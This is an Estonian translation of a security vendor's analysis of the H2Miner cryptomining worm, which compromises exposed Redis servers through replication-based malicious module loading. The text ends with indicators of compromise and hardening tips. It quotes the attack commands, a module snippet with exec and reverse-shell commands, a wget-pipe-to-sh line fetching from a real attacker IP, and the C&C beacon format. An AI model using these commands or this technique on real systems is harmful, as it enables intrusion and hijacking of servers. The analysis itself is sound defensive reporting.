Avastati uus H2Mineri usside puhang, mis kasutab Redis RCE-d

Päev tagasi ründas minu projekti ühte serverit sarnane uss. Otsides vastust küsimusele "mis see oli?" Leidsin Alibaba Cloud Security meeskonna suurepärase artikli. Kuna ma seda artiklit Habré kohta ei leidnud, otsustasin selle spetsiaalselt teie jaoks tõlkida <3

Kanne

Hiljuti avastas Alibaba Cloudi turvameeskond H2Mineri äkilise puhangu. Seda tüüpi pahatahtlikud ussid kasutavad Redise volituse puudumist või nõrku paroole lüüsidena teie süsteemidesse, misjärel sünkroonib see oma pahatahtliku mooduli alammooduliga ülem-alluv sünkroonimise kaudu ja lõpuks laadib selle pahatahtliku mooduli rünnatavasse masinasse ja käivitab pahatahtliku juhiseid.

Varem viidi teie süsteemide vastu suunatud rünnakud peamiselt läbi meetoditega, mis hõlmasid ajastatud toiminguid või SSH-võtmeid, mis kirjutati teie arvutisse pärast seda, kui ründaja oli Redisesse sisse loginud. Õnneks ei saa seda meetodit sageli kasutada lubade kontrolliga seotud probleemide või süsteemi erinevate versioonide tõttu. See pahatahtliku mooduli laadimise meetod võib aga otseselt täita ründaja käske või saada juurdepääsu kestale, mis on teie süsteemile ohtlik.

Kuna Internetis majutatud Redise servereid on palju (ligi 1 miljon), soovitab Alibaba Cloudi turvameeskond sõbraliku meeldetuletusena kasutajatel Redist võrgus mitte jagada ning regulaarselt kontrollida oma paroolide tugevust ja seda, kas need pole rikutud. kiire valik.

H2Miner

H2Miner on Linuxi-põhiste süsteemide kaevandamise robotvõrk, mis võib teie süsteemi tungida mitmel viisil, sealhulgas Hadoopi lõnga, Dockeri ja Redise kaugkäskude täitmise (RCE) haavatavuste tõttu. Botivõrk laadib alla pahatahtlikud skriptid ja pahavara, et kaevandada teie andmeid, laiendada rünnakut horisontaalselt ning säilitada käsu- ja kontrollisuhtlust.

Redis RCE

Pavel Toporkov jagas sellel teemal teadmisi ZeroNights 2018. Pärast versiooni 4.0 toetab Redis pistikprogrammi laadimisfunktsiooni, mis annab kasutajatele võimaluse laadida C-ga kompileeritud faile Redisesse, et täita konkreetseid Redise käske. Kuigi see funktsioon on kasulik, sisaldab see haavatavust, mille puhul saab ülem-alluv-režiimis faile täissünkroonimisrežiimi kaudu alamseadmega sünkroonida. Seda saab ründaja kasutada pahatahtlike failide edastamiseks. Pärast edastuse lõpetamist laadivad ründajad mooduli rünnatud Redise eksemplari ja täidavad mis tahes käsu.

Pahavara usside analüüs

Hiljuti avastas Alibaba Cloudi turvameeskond, et pahatahtliku kaevurite rühma H2Miner suurus on järsult kasvanud. Analüüsi kohaselt on rünnaku toimumise üldine protsess järgmine:

H2Miner kasutab täieõiguslikuks rünnakuks RCE Redist. Ründajad ründavad esmalt kaitsmata Redise servereid või nõrkade paroolidega servereid.

Seejärel kasutavad nad käsku config set dbfilename red2.so faili nime muutmiseks. Pärast seda täidavad ründajad käsu slaveof et määrata ülem-alluv replikatsiooni hosti aadress.

Kui rünnatud Redise eksemplar loob ülem-alluv ühenduse ründajale kuuluva pahatahtliku Redisega, saadab ründaja nakatunud mooduli, kasutades failide sünkroonimiseks käsku fullresync. Seejärel laaditakse fail red2.so alla rünnatavasse masinasse. Seejärel kasutavad ründajad selle so faili laadimiseks laadimismoodulit ./red2.so. Moodul võib rünnatavale masinale juurdepääsu saamiseks täita ründaja käske või algatada vastupidise ühenduse (tagauks).

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Pärast pahatahtliku käsu täitmist, näiteks / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, lähtestab ründaja varukoopiafaili nime ja laadib jälgede puhastamiseks maha süsteemimooduli. Kuid fail red2.so jääb rünnatud masinasse ikkagi alles. Kasutajatel soovitatakse pöörata tähelepanu sellise kahtlase faili olemasolule nende Redise eksemplari kaustas.

Lisaks mõne pahatahtliku protsessi tapmisele, et varastada ressursse, järgis ründaja pahatahtlikku skripti, laadides alla ja käivitades pahatahtlikke binaarfaile 142.44.191.122/kinsing. See tähendab, et protsessi nimi või kataloogi nimi, mis sisaldab hosti kinsingut, võib viidata sellele, et see masin on selle viirusega nakatunud.

Pöördprojekteerimise tulemuste kohaselt täidab pahavara peamiselt järgmisi funktsioone:

• Failide üleslaadimine ja nende käivitamine
• Kaevandamine
• C&C suhtluse säilitamine ja ründaja käskude täitmine

Kasutage masscani väliseks skannimiseks, et oma mõju laiendada. Lisaks on C&C serveri IP-aadress programmis kõvasti kodeeritud ning rünnatud host suhtleb C&C sideserveriga HTTP päringute abil, kus zombie (kompromiteeritud serveri) teave tuvastatakse HTTP päises.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Muud rünnakumeetodid

Ussi kasutatud aadressid ja lingid

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Vihje

Esiteks ei tohiks Redis olla Internetist juurdepääsetav ja see peaks olema kaitstud tugeva parooliga. Samuti on oluline, et kliendid kontrolliksid, et Redi kataloogis poleks faili red2.so ja et hostis poleks faili/protsessi nimes "kinsing".

Allikas: www.habr.com